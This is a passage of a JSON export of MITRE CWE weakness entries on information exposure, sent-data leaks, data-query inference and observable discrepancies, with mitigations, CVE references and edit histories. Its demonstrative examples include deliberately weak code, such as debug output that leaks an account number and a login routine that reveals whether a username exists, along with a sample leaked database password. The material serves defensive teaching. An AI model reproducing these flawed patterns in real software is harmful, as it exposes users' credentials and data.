{","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"%&gt;User account number: &lt;%= acctNo %&gt;&lt;%} %&gt;","xhtml:br":["","","",""]}}}},"Body_Text":"The code writes sensitive debug information to the client browser if the \\"debugEnabled\\" flag is set to true ."},{"attr":{"@_Demonstrative_Example_ID":"DX-111"},"Intro_Text":"This code uses location to determine the user\'s current US State location.","Body_Text":["First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application\'s manifest.xml:","During execution, a call to getLastLocation() will return a location based on the application\'s location permissions. In this case the application has permission for the most accurate location possible:","While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":"&lt;uses-permission android:name=\\"android.permission.ACCESS_FINE_LOCATION\\"/&gt;"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation);","xhtml:br":["","","",""]}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1483","Description":"Enumeration of valid usernames based on inconsistent responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483"},{"Reference":"CVE-2001-1528","Description":"Account number enumeration via inconsistent responses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528"},{"Reference":"CVE-2004-2150","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150"},{"Reference":"CVE-2005-1205","Description":"Telnet protocol allows servers to obtain sensitive environment information from clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1205"},{"Reference":"CVE-2002-1725","Description":"Script calls phpinfo(), revealing system configuration to web user","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1725"},{"Reference":"CVE-2002-0515","Description":"Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515"},{"Reference":"CVE-2004-0778","Description":"Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778"},{"Reference":"CVE-2000-1117","Description":"Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117"},{"Reference":"CVE-2003-0190","Description":"Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190"},{"Reference":"CVE-2008-2049","Description":"POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another weakness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2049"},{"Reference":"CVE-2007-5172","Description":"Program reveals password in error message if attacker can trigger certain database errors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5172"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2007-1409","Description":"Direct request to library file in web application triggers pathname leak in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409"},{"Reference":"CVE-2005-0603","Description":"Malformed regexp syntax leads to information exposure in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603"},{"Reference":"CVE-2004-2268","Description":"Password exposed in debug information.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2268"},{"Reference":"CVE-2003-1078","Description":"FTP client with debug option enabled shows password to the screen.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1078"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Information Leak (information disclosure)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":13,"Entry_Name":"Information Leakage"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"116"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"169"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"224"}},{"attr":{"@_CAPEC_ID":"285"}},{"attr":{"@_CAPEC_ID":"287"}},{"attr":{"@_CAPEC_ID":"290"}},{"attr":{"@_CAPEC_ID":"291"}},{"attr":{"@_CAPEC_ID":"292"}},{"attr":{"@_CAPEC_ID":"293"}},{"attr":{"@_CAPEC_ID":"294"}},{"attr":{"@_CAPEC_ID":"295"}},{"attr":{"@_CAPEC_ID":"296"}},{"attr":{"@_CAPEC_ID":"297"}},{"attr":{"@_CAPEC_ID":"298"}},{"attr":{"@_CAPEC_ID":"299"}},{"attr":{"@_CAPEC_ID":"300"}},{"attr":{"@_CAPEC_ID":"301"}},{"attr":{"@_CAPEC_ID":"302"}},{"attr":{"@_CAPEC_ID":"303"}},{"attr":{"@_CAPEC_ID":"304"}},{"attr":{"@_CAPEC_ID":"305"}},{"attr":{"@_CAPEC_ID":"306"}},{"attr":{"@_CAPEC_ID":"307"}},{"attr":{"@_CAPEC_ID":"308"}},{"attr":{"@_CAPEC_ID":"309"}},{"attr":{"@_CAPEC_ID":"310"}},{"attr":{"@_CAPEC_ID":"312"}},{"attr":{"@_CAPEC_ID":"313"}},{"attr":{"@_CAPEC_ID":"317"}},{"attr":{"@_CAPEC_ID":"318"}},{"attr":{"@_CAPEC_ID":"319"}},{"attr":{"@_CAPEC_ID":"320"}},{"attr":{"@_CAPEC_ID":"321"}},{"attr":{"@_CAPEC_ID":"322"}},{"attr":{"@_CAPEC_ID":"323"}},{"attr":{"@_CAPEC_ID":"324"}},{"attr":{"@_CAPEC_ID":"325"}},{"attr":{"@_CAPEC_ID":"326"}},{"attr":{"@_CAPEC_ID":"327"}},{"attr":{"@_CAPEC_ID":"328"}},{"attr":{"@_CAPEC_ID":"329"}},{"attr":{"@_CAPEC_ID":"330"}},{"attr":{"@_CAPEC_ID":"472"}},{"attr":{"@_CAPEC_ID":"497"}},{"attr":{"@_CAPEC_ID":"508"}},{"attr":{"@_CAPEC_ID":"573"}},{"attr":{"@_CAPEC_ID":"574"}},{"attr":{"@_CAPEC_ID":"575"}},{"attr":{"@_CAPEC_ID":"576"}},{"attr":{"@_CAPEC_ID":"577"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"616"}},{"attr":{"@_CAPEC_ID":"643"}},{"attr":{"@_CAPEC_ID":"646"}},{"attr":{"@_CAPEC_ID":"651"}},{"attr":{"@_CAPEC_ID":"79"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-172"}}},"Notes":{"Note":{"#text":"As a result of mapping analysis in the 2020 Top 25, this weakness is under review, since it is frequently misused in mapping to cover many problems that lead to loss of confidentiality. See Extended Decription and Alternate Terms.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Alternate_Terms, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Related_Attack_Patterns, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Description, Maintenance_Notes, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak (Information Disclosure)","attr":{"@_Date":"2009-12-28"}},{"#text":"Information Exposure","attr":{"@_Date":"2020-02-24"}}]}},"201":{"attr":{"@_ID":"201","@_Name":"Insertion of Sensitive Information Into Sent Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor.","Extended_Description":"Sensitive information could include data that is sensitive in and of itself (such as credentials or private messages), or otherwise useful in the further exploitation of the system (such as internal file system structure).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"209","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"202","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Memory","Read Application Data"],"Note":"Sensitive data may be exposed to attackers."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Specify which data in the software should be regarded as sensitive. Consider which types of users should have access to which types of data."},{"Phase":"Implementation","Description":"Ensure that any possibly sensitive data specified in the requirements is verified with designers to ensure that it is either a calculated risk or mitigated elsewhere. Any information that is not necessary to the functionality should be removed in order to lower both the overhead and the possibility of security sensitive data being sent."},{"Phase":"System Configuration","Description":"Setup default error messages so that unexpected errors do not disclose sensitive information."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-129"},"Intro_Text":"The following is an actual MySQL error statement:","Example_Code":{"attr":{"@_Nature":"result","@_Language":"SQL"},"xhtml:div":"Warning: mysql_pconnect(): Access denied for user: \'root@localhost\' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4"},"Body_Text":"The error clearly exposes the database credentials."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Accidental leaking of sensitive information through sent data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"12"}},{"attr":{"@_CAPEC_ID":"217"}},{"attr":{"@_CAPEC_ID":"612"}},{"attr":{"@_CAPEC_ID":"613"}},{"attr":{"@_CAPEC_ID":"618"}},{"attr":{"@_CAPEC_ID":"619"}},{"attr":{"@_CAPEC_ID":"621"}},{"attr":{"@_CAPEC_ID":"622"}},{"attr":{"@_CAPEC_ID":"623"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Common_Consequences, Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Name, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Sent Data","attr":{"@_Date":"2010-09-27"}},{"#text":"Information Exposure Through Sent Data","attr":{"@_Date":"2020-02-24"}},{"#text":"Exposure of Sensitive Information Through Sent Data","attr":{"@_Date":"2020-08-20"}}]}},"202":{"attr":{"@_ID":"202","@_Name":"Exposure of Sensitive Information Through Data Queries","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"When trying to keep information confidential, an attacker can often infer some of the information by using statistics.","Extended_Description":"In situations where data should not be tied to individual users, but a large number of users should be able to make queries that \\"scrub\\" the identity of users, it may be possible to get information about a user -- e.g., by specifying search terms that are known to be unique to that user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1230","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Files or Directories","Read Application Data"],"Note":"Sensitive information may possibly be leaked through data queries accidentally."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"This is a complex topic. See the book Translucent Databases for a good discussion of best practices."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"See the book Translucent Databases for examples."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Accidental leaking of sensitive information through data queries"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"The relationship between CWE-202 and CWE-612 needs to be investigated more closely, as they may be different descriptions of the same kind of problem.  CWE-202 is also being considered for deprecation, as it is not clearly described and may have been misunderstood by CWE users.  It could be argued that this issue is better covered by CAPEC; an attacker can utilize their data-query privileges to perform this kind of operation, and if the attacker should not be allowed to perform the operation - or if the sensitive data should not have been made accessible at all - then that is more appropriately classified as a separate CWE related to authorization (see the parent, CWE-1230)."}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Maintenance_Notes, Name, References, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Data Queries","attr":{"@_Date":"2008-04-11"}},{"#text":"Privacy Leak through Data Queries","attr":{"@_Date":"2011-03-29"}},{"#text":"Exposure of Sensitive Data Through Data Queries","attr":{"@_Date":"2020-02-24"}}]}},"203":{"attr":{"@_ID":"203","@_Name":"Observable Discrepancy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.","Extended_Description":"Discrepancies can take many forms, and variations may be detectable in timing, control flow, communications such as replies or requests, or general behavior. These discrepancies can reveal information about the product\'s operation or internal state to an unauthorized actor. In some cases, discrepancies can be used by attackers to form a side channel.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Side Channel Attack","Description":"Observable Discrepancies are at the root of side channel attacks."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"],"Note":"An attacker can gain access to sensitive information about the system, including authentication information that may allow an attacker to gain access to the system."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"When cryptographic primitives are vulnerable to side-channel-attacks, this could be used to reveal unencrypted plaintext in the worst case."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-38"},"Intro_Text":"The following code checks validity of the supplied username and password and notifies the user of a successful or failed login.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $username=param(\'username\');my $password=param(\'password\');if (IsValidUsername($username) == 1){}else{}","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"if (IsValidPassword($username, $password) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"print \\"Login Successful\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Login Failed - incorrect password\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"print \\"Login Failed - unknown username\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"\\"Login Failed - incorrect username or password\\""}],"Body_Text":["In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials.","While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as:"]},{"Intro_Text":"Non-uniform processing time causes timing channel.","Example_Code":[{"#text":"Suppose an algorithm for implementing an encryption routine works fine per se, but the time taken to output the result of the encryption routine depends on a relationship between the input plaintext and the key (e.g., suppose, if the plaintext is similar to the key, it would run very fast).","attr":{"@_Nature":"bad"}},{"#text":"Artificial delays may be added to ensured all calculations take equal time to execute.","attr":{"@_Nature":"good"}}],"Body_Text":"In the example above, an attacker may vary the inputs, then observe differences between processing times (since different plaintexts take different time). This could be used to infer information about the key."},{"Intro_Text":"Suppose memory access patterns for an encryption routine are dependent on the secret key.","Body_Text":"An attacker can recover the key by knowing if specific memory locations have been accessed or not.  The value stored at those memory locations is irrelevant.  The encryption routine\'s memory accesses will affect the state of the processor cache.  If cache resources are shared across contexts, after the encryption routine completes, an attacker in different execution context can discover which memory locations the routine accessed by measuring the time it takes for their own memory accesses to complete."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-8695","Description":"Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8695"},{"Reference":"CVE-2002-2094","Description":"This, and others, use \\"..\\" attacks and monitor error responses, so there is overlap with directory traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2094"},{"Reference":"CVE-2001-1483","Description":"Enumeration of valid usernames based on inconsistent responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1483"},{"Reference":"CVE-2001-1528","Description":"Account number enumeration via inconsistent responses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1528"},{"Reference":"CVE-2004-2150","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2150"},{"Reference":"CVE-2005-1650","Description":"User enumeration via discrepancies in error messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1650"},{"Reference":"CVE-2004-0294","Description":"Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0294"},{"Reference":"CVE-2004-0243","Description":"Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0243"},{"Reference":"CVE-2002-0514","Description":"Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0514"},{"Reference":"CVE-2002-0515","Description":"Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0515"},{"Reference":"CVE-2002-0208","Description":"Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0208"},{"Reference":"CVE-2004-2252","Description":"Behavioral infoleak by responding to SYN-FIN packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2252"},{"Reference":"CVE-2001-1387","Description":"Product may generate different responses than specified by the administrator, possibly leading to an information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387"},{"Reference":"CVE-2004-0778","Description":"Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0778"},{"Reference":"CVE-2004-1428","Description":"FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1428"},{"Reference":"CVE-2003-0078","Description":"SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the \\"Vaudenay timing attack.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0078"},{"Reference":"CVE-2000-1117","Description":"Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1117"},{"Reference":"CVE-2003-0637","Description":"Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password 